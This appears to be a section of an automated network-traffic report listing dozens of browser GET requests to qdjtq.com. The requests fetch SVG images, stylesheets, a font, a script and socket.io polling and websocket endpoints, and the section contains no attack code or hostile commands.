Source: global trafficHTTP traffic detected: GET /modify/layout/images/51.svg HTTP/1.1Host: qdjtq.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /modify/layout/images/54.svg HTTP/1.1Host: qdjtq.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /modify/layout/images/57.svg HTTP/1.1Host: qdjtq.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://qdjtq.com/modify/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /modify/layout/images/50.svg HTTP/1.1Host: qdjtq.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=websocket&sid=3E0SqkwJomtmg_wKAHtv HTTP/1.1Host: qdjtq.comConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Upgrade: websocketOrigin: https://qdjtq.comSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Sec-WebSocket-Key: pw3FlDQ2U5IYDCTyMVsmsQ==Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P8muayi&sid=3E0SqkwJomtmg_wKAHtv HTTP/1.1Host: qdjtq.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://qdjtq.com/modify/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P8muaSX HTTP/1.1Host: qdjtq.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P8mub9p&sid=3E0SqkwJomtmg_wKAHtv HTTP/1.1Host: qdjtq.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://qdjtq.com/modify/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /modify/layout/images/58.svg HTTP/1.1Host: qdjtq.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://qdjtq.com/modify/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /modify/layout/images/55.svg HTTP/1.1Host: qdjtq.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /modify/layout/images/59.svg HTTP/1.1Host: qdjtq.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://qdjtq.com/modify/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P8muanP&sid=3E0SqkwJomtmg_wKAHtv HTTP/1.1Host: qdjtq.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P8muanR&sid=3E0SqkwJomtmg_wKAHtv HTTP/1.1Host: qdjtq.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /modify/layout/images/56.svg HTTP/1.1Host: qdjtq.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /modify/layout/images/57.svg HTTP/1.1Host: qdjtq.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /modify/layout/images/60.svg HTTP/1.1Host: qdjtq.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://qdjtq.com/modify/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /modify/assets/84221e6ctE5dP.woff2 HTTP/1.1Host: qdjtq.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://qdjtq.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://qdjtq.com/modify/assets/297557e4tE5dP.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P8muayj&sid=3E0SqkwJomtmg_wKAHtv HTTP/1.1Host: qdjtq.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P8muayi&sid=3E0SqkwJomtmg_wKAHtv HTTP/1.1Host: qdjtq.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /modify/layout/images/59.svg HTTP/1.1Host: qdjtq.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P8mub9p&sid=3E0SqkwJomtmg_wKAHtv HTTP/1.1Host: qdjtq.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /modify/layout/images/58.svg HTTP/1.1Host: qdjtq.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P8mubYv HTTP/1.1Host: qdjtq.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://qdjtq.com/modify/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /modify/layout/images/60.svg HTTP/1.1Host: qdjtq.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P8mubv1&sid=_2bdYdjJ6QcQscIJAHty HTTP/1.1Host: qdjtq.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://qdjtq.com/modify/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=websocket&sid=_2bdYdjJ6QcQscIJAHty HTTP/1.1Host: qdjtq.comConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Upgrade: websocketOrigin: https://qdjtq.comSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Sec-WebSocket-Key: dDsBgl4jdxuW+Ul4QRsAXA==Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P8mubYv HTTP/1.1Host: qdjtq.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /modify/assets/beb21690tE5dP.css HTTP/1.1Host: qdjtq.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://qdjtq.com/modify/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P8mubv0&sid=_2bdYdjJ6QcQscIJAHty HTTP/1.1Host: qdjtq.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P8mubv1&sid=_2bdYdjJ6QcQscIJAHty HTTP/1.1Host: qdjtq.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P8mucF3&sid=_2bdYdjJ6QcQscIJAHty HTTP/1.1Host: qdjtq.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://qdjtq.com/modify/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /modify/assets/e4b62962ajMSD.js HTTP/1.1Host: qdjtq.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://qdjtq.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P8mucF4&sid=_2bdYdjJ6QcQscIJAHty HTTP/1.1Host: qdjtq.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /modify/assets/e4b62962ajMSD.js HTTP/1.1Host: qdjtq.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P8mucF3&sid=_2bdYdjJ6QcQscIJAHty HTTP/1.1Host: qdjtq.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P8mudFX HTTP/1.1Host: qdjtq.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://qdjtq.com/modify/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P8mudFX HTTP/1.1Host: qdjtq.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P8muddg&sid=RcIlUwyZYMmWAnsPAHt1 HTTP/1.1Host: qdjtq.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://qdjtq.com/modify/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=websocket&sid=RcIlUwyZYMmWAnsPAHt1 HTTP/1.1Host: qdjtq.comConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Upgrade: websocketOrigin: https://qdjtq.comSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Sec-WebSocket-Key: rtS9BSIOS4dfLfnNzoL9aA==Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
Source: global trafficHTTP traffic detected: GET /api/MC4yMTY3NjQ0NTM3Mjk2OTA5 HTTP/1.1Host: qdjtq.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P8mudde&sid=RcIlUwyZYMmWAnsPAHt1 HTTP/1.1Host: qdjtq.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P8mudzt&sid=RcIlUwyZYMmWAnsPAHt1 HTTP/1.1Host: qdjtq.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://qdjtq.com/modify/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P8muddg&sid=RcIlUwyZYMmWAnsPAHt1 HTTP/1.1Host: qdjtq.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P8mudzw&sid=RcIlUwyZYMmWAnsPAHt1 HTTP/1.1Host: qdjtq.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P8mudzt&sid=RcIlUwyZYMmWAnsPAHt1 HTTP/1.1Host: qdjtq.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P8mueK9&sid=RcIlUwyZYMmWAnsPAHt1 HTTP/1.1Host: qdjtq.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://qdjtq.com/modify/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P8mueO2&sid=RcIlUwyZYMmWAnsPAHt1 HTTP/1.1Host: qdjtq.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P8muf1I HTTP/1.1Host: qdjtq.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://qdjtq.com/modify/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P8muf1I HTTP/1.1Host: qdjtq.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P8mufNo&sid=N4xB_A2KRU780xSdAHt4 HTTP/1.1Host: qdjtq.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://qdjtq.com/modify/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=websocket&sid=N4xB_A2KRU780xSdAHt4 HTTP/1.1Host: qdjtq.comConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Upgrade: websocketOrigin: https://qdjtq.comSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Sec-WebSocket-Key: LfiH031jsgGta4+UjNWqBg==Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
